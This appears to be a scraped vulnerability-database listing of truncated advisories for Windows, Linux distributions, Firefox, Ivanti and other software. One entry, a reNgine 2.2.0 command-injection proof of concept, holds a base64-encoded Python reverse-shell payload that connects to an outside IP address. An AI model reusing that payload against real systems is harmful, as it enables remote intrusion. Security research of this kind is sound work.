?day POC 漏洞数据库

Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Severity 6 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb5052040 microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb50…

Ubuntu: USN-6021-1 (CVE-2023-1534): Chromium vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 05/05/2023 Added 04/17/2023 Modified 01/28/2025 Description Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) ubuntu-upgrade-chromium-browser References https://attackerkb.com/topics/cve-2023-1534 CVE - 2023-1534 USN-6021-1

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…

FreeBSD: VID-68958E18-ED94-11ED-9688-B42E991FC52E (CVE-2023-28852): glpi -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:M/C:P/I:P/A:N) Published 03/20/2023 Created 05/17/2023 Added 05/16/2023 Modified 01/28/2025 Description GLPI is a free asset and IT management software package. Starting in version 9.5.0 and prior to versions 9.5.13 and 10.0.7, a user with dashboard administration rights may hack the dashboard form to store malicious code that will be executed when other users will use the related dashboard. Versions 9.5.13 and 10.0.7 contain a patch for this issue. Solution(s) freebsd-upgrade-package-glpi Refe…

Alma Linux: CVE-2025-1016: Important: firefox security update (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Memory safety bugs present in Firefox 134, Thunderbird 134, Firefox ESR 115.19, Firefox ESR 128.6, Thunderbird 115.19, and Thunderbird 128.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 135, Firefox ESR < 115.20, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird &lt…

Ivanti Pulse Connect Secure: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs) Severity 4 CVSS (AV:L/AC:L/Au:M/C:C/I:N/A:N) Published 02/11/2025 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Cleartext storage of information in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a local unauthenticated attacker to read sensitive data. Solution(s) pulse-secure-pulse-connect-secure-upgrade-22_7r2_6 References https://attackerkb.com/topics/cve-2024-13843 CVE - 2024-13843…

Ivanti Pulse Connect Secure: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs) Severity 6 CVSS (AV:L/AC:L/Au:S/C:N/I:C/A:C) Published 02/11/2025 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Insufficient permissions in Ivanti Secure Access Client before version 22.8R1 allows a local authenticated attacker to delete arbitrary files. Solution(s) pulse-secure-pulse-connect-secure-upgrade-22_8r1 References https://attackerkb.com/topics/cve-2024-13813 CVE - 2024-13813 https://forums.ivanti.com/s/article/February-Security…

FreeBSD: VID-79B1F4EE-860A-11EF-B2DC-CBCCBF25B7EA: gitea -- token missing access control for packages Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/06/2024 Created 10/12/2024 Added 10/11/2024 Modified 10/11/2024 Description Problem Description: Fix bug when a token is given public only Solution(s) freebsd-upgrade-package-gitea

Amazon Linux AMI 2: CVE-2023-52772: Security patch for kernel (ALASKERNEL-5.15-2024-033) Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 05/21/2024 Created 12/13/2024 Added 12/12/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: af_unix: fix use-after-free in unix_stream_read_actor() syzbot reported the following crash [1] After releasing unix socket lock, u->oob_skb can be changed by another thread. We must temporarily increase skb refcount to make sure this other thread will not free the skb under us. [1] BUG: KASAN: slab-use-after-free in unix_stream_read_actor+0xa7/0xc0 net/…

FreeBSD: VID-68958E18-ED94-11ED-9688-B42E991FC52E (CVE-2023-28636): glpi -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:M/C:P/I:P/A:N) Published 03/20/2023 Created 05/17/2023 Added 05/16/2023 Modified 01/28/2025 Description GLPI is a free asset and IT management software package. Starting in version 0.60 and prior to versions 9.5.13 and 10.0.7, a vulnerability allows an administrator to create a malicious external link. This issue is fixed in versions 9.5.13 and 10.0.7. Solution(s) freebsd-upgrade-package-glpi References CVE-2023-28636

Oracle Linux: CVE-2023-27533: ELSA-2023-6679:curl security update (MODERATE) (Multiple Advisories) Severity 5 CVSS (AV:N/AC:L/Au:N/C:N/I:P/A:N) Published 03/20/2023 Created 07/26/2024 Added 07/22/2024 Modified 11/22/2024 Description A vulnerability in input validation exists in curl &lt;8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and &quot;telnet options&quot; during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform option negotiation without the application&apos;s intent. This vulnerability could be exploited if a…

MFSA2025-07 Firefox: Security Vulnerabilities fixed in Firefox 135 (CVE-2025-1013) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/05/2025 Added 02/05/2025 Modified 02/06/2025 Description A race condition could have led to private browsing tabs being opened in normal browsing windows. This could have resulted in a potential privacy leak. This vulnerability affects Firefox < 135, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird < 135. Solution(s) mozilla-firefox-upgrade-135_0 References https://attackerkb.com/topics/cve-2025-1013 CVE - 2025-1013 http://www.mozilla.org/sec…

Debian: CVE-2025-0510: thunderbird -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/11/2025 Added 02/10/2025 Modified 02/10/2025 Description Thunderbird displayed an incorrect sender address if the From field of an email used the invalid group name syntax that is described in CVE-2024-49040. This vulnerability affects Thunderbird < 128.7 and Thunderbird < 135. Solution(s) debian-upgrade-thunderbird References https://attackerkb.com/topics/cve-2025-0510 CVE - 2025-0510 DLA-4045-1 DSA-5861-1

Ubuntu: (Multiple Advisories) (CVE-2023-28617): Emacs vulnerability Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 03/19/2023 Created 05/05/2023 Added 04/10/2023 Modified 01/28/2025 Description org-babel-execute:latex in ob-latex.el in Org Mode through 9.6.1 for GNU Emacs allows attackers to execute arbitrary commands via a file name or directory name that contains shell metacharacters. Solution(s) ubuntu-pro-upgrade-emacs ubuntu-pro-upgrade-emacs-bin-common ubuntu-pro-upgrade-emacs-common ubuntu-pro-upgrade-emacs-el ubuntu-pro-upgrade-emacs24 ubuntu-pro-upgrade-emacs24-bin-common ubuntu-pro-upgrade-emacs24-common ubuntu-pro…

mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896) Disclosed 02/13/2025 Created 02/25/2025 Description Credential Harvester in MyPRO Manager <= v1.3 from mySCADA. The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity. Author(s) Michael Heinzl Platform Windows Architectures cmd Development Source Code History

Alma Linux: CVE-2025-1014: Important: firefox security update (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Certificate length was not properly checked when added to a certificate store. In practice only trusted data was processed. This vulnerability affects Firefox < 135, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird < 135. Solution(s) alma-upgrade-firefox alma-upgrade-firefox-x11 alma-upgrade-thunderbird References https://attackerkb.com/topics/cve-2025-1014 CVE - 2025-1014 https://erra…

MFSA2025-11 Thunderbird: Security Vulnerabilities fixed in Thunderbird 135 (CVE-2025-0510) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/05/2025 Added 02/05/2025 Modified 02/14/2025 Description Thunderbird displayed an incorrect sender address if the From field of an email used the invalid group name syntax that is described in CVE-2024-49040. This vulnerability affects Thunderbird < 128.7 and Thunderbird < 135. Solution(s) mozilla-thunderbird-upgrade-135_0 References https://attackerkb.com/topics/cve-2025-0510 CVE - 2025-0510 http://www.mozilla.org/security/announce/2025/mfsa2025-11…

FreeBSD: VID-D598266D-7772-4A31-9594-83B76B1FB837 (CVE-2024-36293): Intel CPUs -- multiple vulnerabilities Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/11/2025 Created 02/15/2025 Added 02/13/2025 Modified 02/13/2025 Description Improper access control in the EDECCSSA user leaf function for some Intel(R) Processors with Intel(R) SGX may allow an authenticated user to potentially enable denial of service via local access. Solution(s) freebsd-upgrade-package-cpu-microcode-intel References CVE-2024-36293

Oracle Linux: CVE-2025-1015: ELSA-2025-1184:thunderbird security update (IMPORTANT) (Multiple Advisories) Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 02/04/2025 Created 02/12/2025 Added 02/10/2025 Modified 02/13/2025 Description The Thunderbird Address Book URI fields contained unsanitized links. This could be used by an attacker to create and export an address book containing a malicious payload in a field. For example, in the “Other” field of the Instant Messaging section. If another user imported the address book, clicking on the link could result in opening a web page inside Thunderbird, and that page could execute (unprivileged) Java…

Adobe Illustrator: CVE-2025-21163: Security updates available for Adobe Illustrator (APSB25-11) Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/14/2025 Added 02/12/2025 Modified 02/12/2025 Description Adobe has released an update for Adobe Illustrator. This update resolves critical vulnerabilities that could lead to arbitrary code execution. Adobe is not aware of any exploits in the wild for any of the issues addressed in these updates. Solution(s) adobe-illustrator-upgrade-latest References https://attackerkb.com/topics/cve-2025-21163 CVE - 2025-21163 https://helpx.adobe.com/security/products/…

SUSE: CVE-2024-36922: SUSE Linux Security Advisory Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 05/30/2024 Created 06/24/2024 Added 06/24/2024 Modified 08/28/2024 Description In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: read txq->read_ptr under lock If we read txq->read_ptr without lock, we can read the same value twice, then obtain the lock, and reclaim from there to two different places, but crucially reclaim the same entry twice, resulting in the WARN_ONCE() a little later. Fix that by reading txq->read_ptr under lock. Solution(s) suse-upgrade-cluster-md-kmp-64kb suse-upg…

FreeBSD: VID-A4F8BB03-F52F-11ED-9859-080027083A05 (CVE-2023-28322): curl -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:N/C:P/I:N/A:N) Published 03/21/2023 Created 05/23/2023 Added 05/20/2023 Modified 01/28/2025 Description Details for this vulnerability have not been published by NIST at this point. Descriptions from software vendor advisories for this issue are provided below. From VID-A4F8BB03-F52F-11ED-9859-080027083A05: Wei Chong Tan, Harry Sintonen, and Hiroki Kurosawa reports: This update fixes 4 security vulnerabilities: Medium CVE-2023-28319: UAF in SSH sha256 fingerprint check. Reported by Wei Chong Tan on 202…

Amazon Linux AMI 2: CVE-2024-12705: Security patch for bind (ALAS-2025-2751) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 01/29/2025 Created 02/05/2025 Added 02/05/2025 Modified 02/05/2025 Description Clients using DNS-over-HTTPS (DoH) can exhaust a DNS resolver's CPU and/or memory by flooding it with crafted valid or invalid HTTP/2 traffic. This issue affects BIND 9 versions 9.18.0 through 9.18.32, 9.20.0 through 9.20.4, 9.21.0 through 9.21.3, and 9.18.11-S1 through 9.18.32-S1. Solution(s) amazon-linux-ami-2-upgrade-bind amazon-linux-ami-2-upgrade-bind-chroot amazon-linux-ami-2-upgrade-bind-debuginfo amazon-linux-ami-2-up…

Red Hat: CVE-2023-28164: CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation (Multiple Advisories) Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N) Published 03/20/2023 Created 03/22/2023 Added 03/21/2023 Modified 01/28/2025 Description Dragging a URL from a cross-origin iframe that was removed during the drag could have led to user confusion and website spoofing attacks. This vulnerability affects Firefox < 111, Firefox ESR < 102.9, and Thunderbird < 102.9. Solution(s) redhat-upgrade-firefox redhat-upgrade-firefox-debuginfo redhat-upgrade-firefox-debugsource redha…

SUSE: CVE-2025-22865: SUSE Linux Security Advisory Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 01/28/2025 Created 01/31/2025 Added 01/30/2025 Modified 02/12/2025 Description Using ParsePKCS1PrivateKey to parse a RSA key that is missing the CRT values would panic when verifying that the key is well formed. Solution(s) suse-upgrade-go1-24 suse-upgrade-go1-24-doc suse-upgrade-go1-24-race suse-upgrade-govulncheck-vulndb References https://attackerkb.com/topics/cve-2025-22865 CVE - 2025-22865